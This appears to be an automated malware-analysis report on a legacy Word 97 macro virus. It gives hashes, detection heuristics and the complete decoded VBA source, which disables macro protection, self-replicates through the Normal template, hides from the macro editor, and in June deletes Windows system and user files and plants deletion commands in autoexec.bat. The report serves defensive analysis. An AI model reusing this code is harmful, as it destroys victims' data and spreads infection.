Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 405417c855af246f…

MALICIOUS

Office (OLE)

53.0 KB Created: 1998-05-02 16:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7b7539a9bfd38c2fb9a594ec6d58039d SHA-1: ee8ace47ef48c8f2b74574fc233fbcc39002838f SHA-256: 405417c855af246f5b18415b8be91ca71bd30f1fd04250f8c00ec0ac11a9d229
298 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This document contains legacy WordBasic macros that are designed to delete files and system directories, particularly if the current month is June. The macro attempts to append a line to 'c:\autoexec.bat' and then proceeds to delete files in 'c:\windows', 'c:\windows\system', and 'c:\My Documents'. The presence of AutoOpen and AutoClose macros, along with legacy WordBasic markers, strongly indicates malicious intent.

Heuristics 8

  • ClamAV: Doc.Trojan.Satan-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Satan-9
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 54,272 bytes but its declared streams total only 30,451 bytes — 23,821 bytes (44%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://members.xoom.com/virmike In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4110 bytes
SHA-256: 5d072e3f3ceb57163f2adddc2fdd42c0e95ef4550699a2ae4b6bab6602050cff
Detection
ClamAV: Doc.Trojan.Satan-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Satan666"
Sub Satan666()

Dim IFlag
Dim I

Options.VirusProtection = False

IFlag = 0

For I = 1 To WordBasic.CountMacros(0, 0)
    If WordBasic.[MacroName$](I, 0, 0) = "Satan666" Then
        IFlag = 1
    End If
Next I

If IFlag = 1 Then
    GoTo GlobalFine
Else
    On Error Resume Next
    Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Satan666", wdOrganizerObjectProjectItems
End If

GlobalFine:

IFlag = 0
    
For I = 1 To WordBasic.CountMacros(1, 0)
    If WordBasic.[MacroName$](I, 1, 0) = "Satan666" Then
        IFlag = 1
    End If
Next I
    
If IFlag = 1 Then
    GoTo DocumentFine
Else
    On Error Resume Next
    Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "Satan666", wdOrganizerObjectProjectItems
End If

DocumentFine:

If Month(Now()) = 6 Then

    On Error GoTo KillThem
    Open "c:\autoexec.bat" For Input As #1
    Line Input #1, IFlag
    Close #1
    If IFlag <> "REM Hail Satan!" Then
KillThem:
        Kill "c:\windows\*.*"
        Kill "c:\windows\system\*.*"
        Kill "c:\My Documents"
    
        Open "c:\autoexec.bat" For Append As #1
        Print #1, "@echo off"
        Print #1, "cls"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Hail Satan!"
        Print #1, "echo Y>Yes"
        Print #1, "attrib -h -r -s *.*"
        Print #1, "del *.* <Yes"
        Print #1, "end"
        Close #1
   
        MsgBox "Hail Satan!", vbOKOnly, "Satan666 Word97 Virus"
    Else
                
    End If

End If
   
End Sub
Sub FileOpen()
On Error Resume Next
Application.Run "Satan666"
Dialogs(wdDialogFileOpen).Show
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub FileClose()
On Error Resume Next
Application.Run "Satan666"
WordBasic.FileClose
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub FileSaveAs()
On Error Resume Next
Application.Run "Satan666"
Dialogs(wdDialogFileSaveAs).Show
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub FileSave()
On Error Resume Next
Application.Run "Satan666"
ActiveDocument.Save
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub FileNew()
On Error Resume Next
Application.Run "Satan666"
Dialogs(wdDialogFileNew).Show
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoExec()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoNew()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoSave()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoClose()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub AutoOpen()
On Error Resume Next
Application.Run "Satan666"
End Sub
Sub ToolsOptions()
Dialogs(wdDialogToolsOptions).Show
On Error Resume Next
Options.VirusProtection = False
Application.Run "Satan666"
End Sub
Sub ViewVBCode()
On Error GoTo NotHome
Open "c:\autoexec.bat" For Input As #1
Line Input #1, IFlag
Close #1

If IFlag = "REM Hail Satan!" Then
    Application.ShowVisualBasicEditor = True
Else
NotHome:
    MsgBox "Sub or Function not defined", vbExclamation + vbOKOnly, "Microsoft Visual Basic"
    Application.Run "Satan666"
End If
End Sub
Sub ToolsMacro()
On Error GoTo NotHome
Open "c:\autoexec.bat" For Input As #1
Line Input #1, IFlag
Close #1

If IFlag = "REM Hail Satan!" Then
    Application.Dialogs(wdDialogToolsMacro).Show
Else
NotHome:
    MsgBox "Sub or Function not defined", vbExclamation + vbOKOnly, "Microsoft Visual Basic"
    Application.Run "Satan666"
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.